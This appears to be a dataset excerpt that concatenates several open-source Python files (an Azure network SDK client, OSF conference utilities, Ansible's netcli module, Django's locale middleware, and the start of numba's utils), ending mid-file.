        deserialized = self._deserialize('RouteFilterRule', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def begin_create_or_update(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    route_filter_rule_parameters: "_models.RouteFilterRule",
    **kwargs
) -> AsyncLROPoller["_models.RouteFilterRule"]:
    """Creates or updates a route in the specified route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :param rule_name: The name of the route filter rule.
    :type rule_name: str
    :param route_filter_rule_parameters: Parameters supplied to the create or update route filter
     rule operation.
    :type route_filter_rule_parameters: ~azure.mgmt.network.v2019_02_01.models.RouteFilterRule
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
     False for no polling, or your own initialized polling object for a personal polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either RouteFilterRule or the result of cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_02_01.models.RouteFilterRule]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True)  # type: Union[bool, AsyncPollingMethod]
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
    # Only issue the initial request when not resuming from a saved token.
    if cont_token is None:
        raw_result = await self._create_or_update_initial(
            resource_group_name=resource_group_name,
            route_filter_name=route_filter_name,
            rule_name=rule_name,
            route_filter_rule_parameters=route_filter_rule_parameters,
            cls=lambda x,y,z: x,
            **kwargs
        )

    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)

    def get_long_running_output(pipeline_response):
        # Deserialize the final response body into a RouteFilterRule model.
        deserialized = self._deserialize('RouteFilterRule', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }

    # Final state of the PUT LRO is read via the Azure-AsyncOperation header.
    if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = AsyncNoPolling()
    else: polling_method = polling
    if cont_token:
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)

begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def _update_initial(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    route_filter_rule_parameters: "_models.PatchRouteFilterRule",
    **kwargs
) -> "_models.RouteFilterRule":
    """Issue the initial PATCH request of the update long-running operation.

    Returns the deserialized RouteFilterRule from the first response;
    polling to completion is handled by the public ``begin_update`` method.
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    # Base ARM error map; callers may extend it via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-02-01"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"
    # Construct URL
    url = self._update_initial.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
    # Serialize the request body and send the PATCH through the pipeline.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(route_filter_rule_parameters, 'PatchRouteFilterRule')
    body_content_kwargs['content'] = body_content
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    if response.status_code not in [200]:
        # Translate known status codes to typed errors, else a generic ARM error.
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)
    deserialized = self._deserialize('RouteFilterRule', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def begin_update(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    route_filter_rule_parameters: "_models.PatchRouteFilterRule",
    **kwargs
) -> AsyncLROPoller["_models.RouteFilterRule"]:
    """Updates a route in the specified route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :param rule_name: The name of the route filter rule.
    :type rule_name: str
    :param route_filter_rule_parameters: Parameters supplied to the update route filter rule
     operation.
    :type route_filter_rule_parameters: ~azure.mgmt.network.v2019_02_01.models.PatchRouteFilterRule
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
     False for no polling, or your own initialized polling object for a personal polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either RouteFilterRule or the result of cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_02_01.models.RouteFilterRule]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True)  # type: Union[bool, AsyncPollingMethod]
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
    if cont_token is None:
        # Fresh operation: send the initial PATCH.  The identity ``cls``
        # (lambda x,y,z: x) hands the raw pipeline response to the poller.
        raw_result = await self._update_initial(
            resource_group_name=resource_group_name,
            route_filter_name=route_filter_name,
            rule_name=rule_name,
            route_filter_rule_parameters=route_filter_rule_parameters,
            cls=lambda x,y,z: x,
            **kwargs
        )
    # These kwargs were consumed by the initial request and must not be
    # forwarded to the polling method below.
    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)

    def get_long_running_output(pipeline_response):
        # Deserialize the terminal response of the long-running operation.
        deserialized = self._deserialize('RouteFilterRule', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    # Select polling strategy: default ARM polling, no polling, or caller-supplied.
    if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = AsyncNoPolling()
    else: polling_method = polling
    if cont_token:
        # Resume a previously started operation from its saved state.
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
def list_by_route_filter(
    self,
    resource_group_name: str,
    route_filter_name: str,
    **kwargs
) -> AsyncIterable["_models.RouteFilterRuleListResult"]:
    """Gets all RouteFilterRules in a route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either RouteFilterRuleListResult or the result of cls(response)
    :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_02_01.models.RouteFilterRuleListResult]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRuleListResult"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-02-01"
    accept = "application/json"

    def prepare_request(next_link=None):
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        if not next_link:
            # First page: build the URL from the operation metadata.
            # Construct URL
            url = self.list_by_route_filter.metadata['url']  # type: ignore
            path_format_arguments = {
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
                'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters
            query_parameters = {}  # type: Dict[str, Any]
            query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            # Subsequent pages: the service returns a complete nextLink URL,
            # so no query parameters are added.
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    async def extract_data(pipeline_response):
        # Split one page into (link to next page, items of this page).
        deserialized = self._deserialize('RouteFilterRuleListResult', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, AsyncList(list_of_elem)

    async def get_next(next_link=None):
        # Fetch one page, raising typed errors on non-200 responses.
        request = prepare_request(next_link)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        return pipeline_response
    return AsyncItemPaged(
        get_next, extract_data
    )
list_by_route_filter.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules'}  # type: ignore
| mit |
cslzchen/osf.io | website/conferences/utils.py | 6 | 2593 | # -*- coding: utf-8 -*-
import requests
from framework.auth import Auth
from addons.wiki.models import WikiPage
from website import settings
from osf.models import MailRecord
from api.base.utils import waterbutler_api_url_for
from osf.exceptions import NodeStateError
from osf.utils.permissions import ADMIN
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
def record_message(message, node_created, user_created):
    """Persist a MailRecord for an inbound conference email.

    Links the node that the message created and, when present, the user
    account the message caused to be created.
    """
    mail_record = MailRecord.objects.create(data=message.raw)
    if user_created:
        mail_record.users_created.add(user_created)
    mail_record.nodes_created.add(node_created)
    mail_record.save()
def provision_node(conference, message, node, user):
    """Populate a freshly created conference submission node: write the
    'home' wiki from the email body, add conference admins as hidden
    contributors, set privacy, and apply tags.

    :param Conference conference:
    :param ConferenceMessage message:
    :param Node node:
    :param User user:
    """
    auth = Auth(user=user)
    try:
        wiki = WikiPage.objects.create_for_node(node, 'home', message.text, auth)
    except NodeStateError:
        # A 'home' wiki already exists (node re-provisioned): update it instead.
        wiki = WikiPage.objects.get_for_node(node, 'home')
        wiki.update(user, message.text)
    if conference.admins.exists():
        node.add_contributors(prepare_contributors(conference.admins.all()), log=False)
    if not message.is_spam and conference.public_projects:
        # NOTE(review): meeting_creation=True presumably skips the usual
        # side effects of making a node public -- confirm against set_privacy.
        node.set_privacy('public', meeting_creation=True, auth=auth)
    conference.submissions.add(node)
    node.add_tag(message.conference_category, auth=auth)
    for systag in ['emailed', message.conference_name, message.conference_category]:
        node.add_system_tag(systag, save=False)
    if message.is_spam:
        node.add_system_tag('spam', save=False)
    # Single save persists all system tags added with save=False above.
    node.save()
def prepare_contributors(admins):
    """Build the contributor dicts used by ``Node.add_contributors``:
    each admin is added with ADMIN permissions but not publicly visible."""
    contributors = []
    for admin in admins:
        contributors.append({
            'user': admin,
            'permissions': ADMIN,
            'visible': False,
        })
    return contributors
def upload_attachment(user, node, attachment):
    """Upload one email attachment into *node*'s osfstorage via WaterButler.

    :param user: contributor whose session cookie authenticates the PUT
    :param node: target node
    :param attachment: file-like object exposing ``filename`` and ``read()``
    """
    # The stream may already have been consumed by earlier processing.
    attachment.seek(0)
    name = (attachment.filename or settings.MISSING_FILE_NAME)
    content = attachment.read()
    upload_url = waterbutler_api_url_for(node._id, 'osfstorage', name=name, base_url=node.osfstorage_region.waterbutler_url, cookie=user.get_or_create_cookie().decode(), _internal=True)
    # NOTE(review): no timeout is set; a stalled WaterButler would block the
    # caller indefinitely -- consider requests.put(..., timeout=...).
    resp = requests.put(
        upload_url,
        data=content,
    )
    resp.raise_for_status()
def upload_attachments(user, node, attachments):
    """Upload every attachment of an inbound message to *node*'s storage."""
    for item in attachments:
        upload_attachment(user, node, item)
def is_valid_email(email):
    """Return True iff Django's email validator accepts *email*."""
    try:
        validate_email(email)
    except ValidationError:
        return False
    return True
| apache-2.0 |
jonathonwalz/ansible | lib/ansible/module_utils/netcli.py | 18 | 9677 | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Copyright (c) 2015 Peter Sprygada, <psprygada@ansible.com>
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import shlex
import time
from ansible.module_utils.basic import BOOLEANS_TRUE, BOOLEANS_FALSE, get_exception
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils.six.moves import zip
def to_list(val):
    """Normalize *val* to a list.

    Lists/tuples are shallow-copied into a new list, None becomes an
    empty list, and any other value is wrapped in a one-element list.
    """
    if val is None:
        return []
    if isinstance(val, (list, tuple)):
        return list(val)
    return [val]
class FailedConditionsError(Exception):
    """Raised when one or more wait-for conditions never became true."""

    def __init__(self, msg, failed_conditions):
        Exception.__init__(self, msg)
        # list of the raw conditional strings that were not satisfied
        self.failed_conditions = failed_conditions
class FailedConditionalError(Exception):
    """Raised when a single conditional cannot be applied to a result."""

    def __init__(self, msg, failed_conditional):
        Exception.__init__(self, msg)
        # the raw conditional string that could not be evaluated
        self.failed_conditional = failed_conditional
class AddCommandError(Exception):
    """Raised when a duplicate command is queued on a CommandRunner."""

    def __init__(self, msg, command):
        Exception.__init__(self, msg)
        # the offending command string
        self.command = command
class AddConditionError(Exception):
    """Raised when a conditional expression cannot be parsed/registered."""

    def __init__(self, msg, condition):
        Exception.__init__(self, msg)
        # the raw conditional expression that failed to register
        self.condition = condition
class Cli(object):
    """Thin wrapper around a network connection that coerces plain strings
    into Command objects and runs them via ``connection.run_commands``."""

    def __init__(self, connection):
        self.connection = connection
        # fall back to 'text' when the connection declares no default output
        self.default_output = connection.default_output or 'text'
        self._commands = list()

    @property
    def commands(self):
        # string forms of the currently queued commands
        return [str(c) for c in self._commands]

    def __call__(self, commands, output=None):
        """Run *commands* immediately (bypassing the queue); return responses."""
        objects = list()
        for cmd in to_list(commands):
            objects.append(self.to_command(cmd, output))
        return self.connection.run_commands(objects)

    def to_command(self, command, output=None, prompt=None, response=None, **kwargs):
        """Coerce *command* into a Command, compiling a string *prompt*
        into an escaped regular expression."""
        output = output or self.default_output
        if isinstance(command, Command):
            return command
        if isinstance(prompt, string_types):
            prompt = re.compile(re.escape(prompt))
        return Command(command, output, prompt=prompt, response=response, **kwargs)

    def add_commands(self, commands, output=None, **kwargs):
        """Queue *commands* for a later ``run_commands()`` call."""
        for cmd in commands:
            self._commands.append(self.to_command(cmd, output, **kwargs))

    def run_commands(self):
        """Execute the queued commands, attaching each response to its Command."""
        responses = self.connection.run_commands(self._commands)
        for resp, cmd in zip(responses, self._commands):
            cmd.response = resp
        # wipe out the commands list to avoid issues if additional
        # commands are executed later
        self._commands = list()
        return responses
class Command(object):
    """Value object describing a single CLI command.

    Holds the command string, its expected output format, an optional
    prompt/response pair for interactive commands, any extra keyword
    arguments (in ``args``), and -- once executed -- the device response.
    """

    def __init__(self, command, output=None, prompt=None, response=None,
                 **kwargs):
        self.command = command
        self.command_string = command
        self.output = output
        self.prompt = prompt
        self.response = response
        self.args = kwargs

    def __str__(self):
        return self.command_string
class CommandRunner(object):
    """Runs a batch of CLI commands repeatedly until the registered
    Conditional objects are satisfied or the retries are exhausted."""

    def __init__(self, module):
        self.module = module
        self.items = list()
        self.conditionals = set()
        self.commands = list()
        # retries/interval bound how long we wait for conditionals to pass
        self.retries = 10
        self.interval = 1
        # 'all' requires every conditional to pass; 'any' returns on the first
        self.match = 'all'
        self._default_output = module.connection.default_output

    def add_command(self, command, output=None, prompt=None, response=None,
                    **kwargs):
        """Queue *command*; raises AddCommandError for duplicates."""
        if command in [str(c) for c in self.commands]:
            raise AddCommandError('duplicated command detected', command=command)
        cmd = self.module.cli.to_command(command, output=output, prompt=prompt,
                                         response=response, **kwargs)
        self.commands.append(cmd)

    def get_command(self, command, output=None):
        """Return the stored response for *command*.

        Note: the *output* argument is currently unused.
        """
        for cmd in self.commands:
            if cmd.command == command:
                return cmd.response
        raise ValueError("command '%s' not found" % command)

    def get_responses(self):
        # responses in queue order (None for commands not yet run)
        return [cmd.response for cmd in self.commands]

    def add_conditional(self, condition):
        """Parse and register a wait-for conditional expression."""
        try:
            self.conditionals.add(Conditional(condition))
        except AttributeError:
            # Conditional raises AttributeError for unknown operators.
            exc = get_exception()
            raise AddConditionError(msg=str(exc), condition=condition)

    def run(self):
        """Run the queued commands until all (or any) conditionals pass.

        Raises FailedConditionsError when retries run out with
        conditionals still unsatisfied.
        """
        while self.retries > 0:
            self.module.cli.add_commands(self.commands)
            responses = self.module.cli.run_commands()
            # iterate over a copy because satisfied items are removed
            for item in list(self.conditionals):
                if item(responses):
                    if self.match == 'any':
                        return item
                    self.conditionals.remove(item)
            if not self.conditionals:
                break
            time.sleep(self.interval)
            self.retries -= 1
        else:
            # while-else: only reached when retries hit zero without break
            failed_conditions = [item.raw for item in self.conditionals]
            errmsg = 'One or more conditional statements have not been satisfied'
            raise FailedConditionsError(errmsg, failed_conditions)
class Conditional(object):
    """Used in command modules to evaluate waitfor conditions.

    A conditional is a whitespace-separated triple ``"<key> <op> <value>"``
    (split with shlex, so quoted values may contain spaces), for example
    ``"result[0].state eq up"``.  ``key`` is a dotted/indexed path into the
    command results, ``op`` is one of the OPERATORS aliases, and ``value``
    is cast to bool/float/int/text as appropriate.

    Calling the instance with the list of command responses evaluates the
    condition and returns the comparison result.

    :raises ValueError: if the conditional string cannot be parsed.
    :raises AttributeError: if the operator is unknown.
    """

    # operator name -> aliases accepted in conditional expressions
    OPERATORS = {
        'eq': ['eq', '=='],
        'neq': ['neq', 'ne', '!='],
        'gt': ['gt', '>'],
        'ge': ['ge', '>='],
        'lt': ['lt', '<'],
        'le': ['le', '<='],
        'contains': ['contains'],
        'matches': ['matches']
    }

    def __init__(self, conditional, encoding=None):
        # *encoding* is accepted for backward compatibility but unused.
        self.raw = conditional
        try:
            key, op, val = shlex.split(conditional)
        except ValueError:
            raise ValueError('failed to parse conditional')
        self.key = key
        self.func = self._func(op)
        self.value = self._cast_value(val)

    def __call__(self, data):
        value = self.get_value(dict(result=data))
        return self.func(value)

    def _cast_value(self, value):
        # Interpret the right-hand side literally: booleans first,
        # then numbers, falling back to text.
        if value in BOOLEANS_TRUE:
            return True
        elif value in BOOLEANS_FALSE:
            return False
        elif re.match(r'^\d+\.\d+$', value):
            # BUGFIX: pattern was r'^\d+\.d+$' (missing backslash before the
            # second 'd'), so real floats like "3.14" were never cast to float.
            return float(value)
        elif re.match(r'^\d+$', value):
            return int(value)
        else:
            return text_type(value)

    def _func(self, oper):
        """Map an operator alias to the bound comparison method."""
        for func, operators in self.OPERATORS.items():
            if oper in operators:
                return getattr(self, func)
        raise AttributeError('unknown operator: %s' % oper)

    def get_value(self, result):
        try:
            return self.get_json(result)
        except (IndexError, TypeError, AttributeError):
            msg = 'unable to apply conditional to result'
            raise FailedConditionalError(msg, self.raw)

    def get_json(self, result):
        """Resolve the dotted/indexed key path against *result*."""
        # Normalize "a['b']" / 'a["b"]' subscripts to dotted form, then
        # split on dots that are not inside brackets.
        string = re.sub(r"\[[\'|\"]", ".", self.key)
        string = re.sub(r"[\'|\"]\]", ".", string)
        parts = re.split(r'\.(?=[^\]]*(?:\[|$))', string)
        for part in parts:
            match = re.findall(r'\[(\S+?)\]', part)
            if match:
                key = part[:part.find('[')]
                result = result[key]
                for m in match:
                    # numeric subscripts index lists; others index dicts
                    try:
                        m = int(m)
                    except ValueError:
                        m = str(m)
                    result = result[m]
            else:
                result = result.get(part)
        return result

    def number(self, value):
        """Coerce *value* to int or float for numeric comparisons."""
        if '.' in str(value):
            return float(value)
        else:
            return int(value)

    def eq(self, value):
        return value == self.value

    def neq(self, value):
        return value != self.value

    def gt(self, value):
        return self.number(value) > self.value

    def ge(self, value):
        return self.number(value) >= self.value

    def lt(self, value):
        return self.number(value) < self.value

    def le(self, value):
        return self.number(value) <= self.value

    def contains(self, value):
        return str(self.value) in value

    def matches(self, value):
        match = re.search(self.value, value, re.M)
        return match is not None
| gpl-3.0 |
Beauhurst/django | django/middleware/locale.py | 35 | 3058 | from django.conf import settings
from django.conf.urls.i18n import is_language_prefix_patterns_used
from django.http import HttpResponseRedirect
from django.urls import get_script_prefix, is_valid_path
from django.utils import translation
from django.utils.cache import patch_vary_headers
from django.utils.deprecation import MiddlewareMixin
class LocaleMiddleware(MiddlewareMixin):
    """
    Parse a request and decide what translation object to install in the
    current thread context. This allows pages to be dynamically translated to
    the language the user desires (if the language is available, of course).
    """
    response_redirect_class = HttpResponseRedirect

    def process_request(self, request):
        # URLconf may be overridden per-request via request.urlconf.
        urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
        i18n_patterns_used, prefixed_default_language = is_language_prefix_patterns_used(urlconf)
        language = translation.get_language_from_request(request, check_path=i18n_patterns_used)
        language_from_path = translation.get_language_from_path(request.path_info)
        if not language_from_path and i18n_patterns_used and not prefixed_default_language:
            # Unprefixed URL while the default language is served without a
            # prefix: serve the project default rather than a detected one.
            language = settings.LANGUAGE_CODE
        translation.activate(language)
        request.LANGUAGE_CODE = translation.get_language()

    def process_response(self, request, response):
        language = translation.get_language()
        language_from_path = translation.get_language_from_path(request.path_info)
        urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
        i18n_patterns_used, prefixed_default_language = is_language_prefix_patterns_used(urlconf)
        if (response.status_code == 404 and not language_from_path and
                i18n_patterns_used and prefixed_default_language):
            # Maybe the language code is missing in the URL? Try adding the
            # language prefix and redirecting to that URL.
            language_path = '/%s%s' % (language, request.path_info)
            path_valid = is_valid_path(language_path, urlconf)
            # If the prefixed path is still invalid, it may only be missing a
            # trailing slash (honouring APPEND_SLASH).
            path_needs_slash = (
                not path_valid and (
                    settings.APPEND_SLASH and not language_path.endswith('/') and
                    is_valid_path('%s/' % language_path, urlconf)
                )
            )
            if path_valid or path_needs_slash:
                script_prefix = get_script_prefix()
                # Insert language after the script prefix and before the
                # rest of the URL
                language_url = request.get_full_path(force_append_slash=path_needs_slash).replace(
                    script_prefix,
                    '%s%s/' % (script_prefix, language),
                    1
                )
                return self.response_redirect_class(language_url)
        if not (i18n_patterns_used and language_from_path):
            # Responses may vary by Accept-Language when the language is not
            # fixed by the URL prefix.
            patch_vary_headers(response, ('Accept-Language',))
        if 'Content-Language' not in response:
            response['Content-Language'] = language
        return response
| bsd-3-clause |
GaZ3ll3/numba | numba/utils.py | 1 | 27776 | from __future__ import print_function, division, absolute_import
import atexit
import collections
import functools
import io
import itertools
import os
import threading
import timeit
import math
import sys
import numpy
from .six import *
from numba.config import PYVERSION, MACHINE_BITS
IS_PY3 = PYVERSION >= (3, 0)
if IS_PY3:
import builtins
INT_TYPES = (int,)
longint = int
get_ident = threading.get_ident
intern = sys.intern
file_replace = os.replace
else:
import thread
import __builtin__ as builtins
INT_TYPES = (int, long)
longint = long
get_ident = thread.get_ident
intern = intern
if sys.platform == 'win32':
def file_replace(src, dest):
# Best-effort emulation of os.replace()
try:
os.rename(src, dest)
except OSError:
os.unlink(dest)
os.rename(src, dest)
else:
file_replace = os.rename
try:
from inspect import signature as pysignature
except ImportError:
try:
from funcsigs import signature as pysignature
except ImportError:
raise ImportError("please install the 'funcsigs' package "
"('pip install funcsigs')")
try:
from functools import singledispatch
except ImportError:
try:
from singledispatch import singledispatch
except ImportError:
raise ImportError("please install the 'singledispatch' package "
"('pip install singledispatch')")
# Mapping between operator module functions and the corresponding built-in
# operators.
# Each entry is (binary function name, in-place function name, operator
# token); the in-place name is '' for comparisons and unary operators,
# which have no in-place variant.
operator_map = [
    # Binary
    ('add', 'iadd', '+'),
    ('sub', 'isub', '-'),
    ('mul', 'imul', '*'),
    ('floordiv', 'ifloordiv', '//'),
    ('truediv', 'itruediv', '/'),
    ('mod', 'imod', '%'),
    ('pow', 'ipow', '**'),
    ('and_', 'iand', '&'),
    ('or_', 'ior', '|'),
    ('xor', 'ixor', '^'),
    ('lshift', 'ilshift', '<<'),
    ('rshift', 'irshift', '>>'),
    ('eq', '', '=='),
    ('ne', '', '!='),
    ('lt', '', '<'),
    ('le', '', '<='),
    ('gt', '', '>'),
    ('ge', '', '>='),
    # Unary
    ('pos', '', '+'),
    ('neg', '', '-'),
    ('invert', '', '~'),
    ('not_', '', 'not'),
]
if not IS_PY3:
    # Python 2 only: classic division operator
    operator_map.append(('div', 'idiv', '/?'))

# Map of known in-place operators to their corresponding copying operators
inplace_map = dict((op + '=', op)
                   for (_bin, _inp, op) in operator_map
                   if _inp)
_shutting_down = False
def _at_shutdown():
global _shutting_down
_shutting_down = True
atexit.register(_at_shutdown)
def shutting_down(globals=globals):
"""
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
# At shutdown, the attribute may have been cleared or set to None.
v = globals().get('_shutting_down')
return v is True or v is None
class ConfigOptions(object):
    """A named set of boolean flags.

    Subclasses declare the legal flag names in ``OPTIONS``; any other name
    raises NameError.  Reading a flag name as an attribute reports whether
    it is enabled.  Instances are hashable and compare equal when the same
    flags are enabled.
    """

    OPTIONS = ()

    def __init__(self):
        self._enabled = set()

    def _validate(self, name):
        # Reject any flag name not declared by the (sub)class.
        if name not in self.OPTIONS:
            raise NameError("Invalid flag: %s" % name)

    def set(self, name):
        """Enable flag *name*."""
        self._validate(name)
        self._enabled.add(name)

    def unset(self, name):
        """Disable flag *name* (no-op when already disabled)."""
        self._validate(name)
        self._enabled.discard(name)

    def __getattr__(self, name):
        self._validate(name)
        return name in self._enabled

    def __repr__(self):
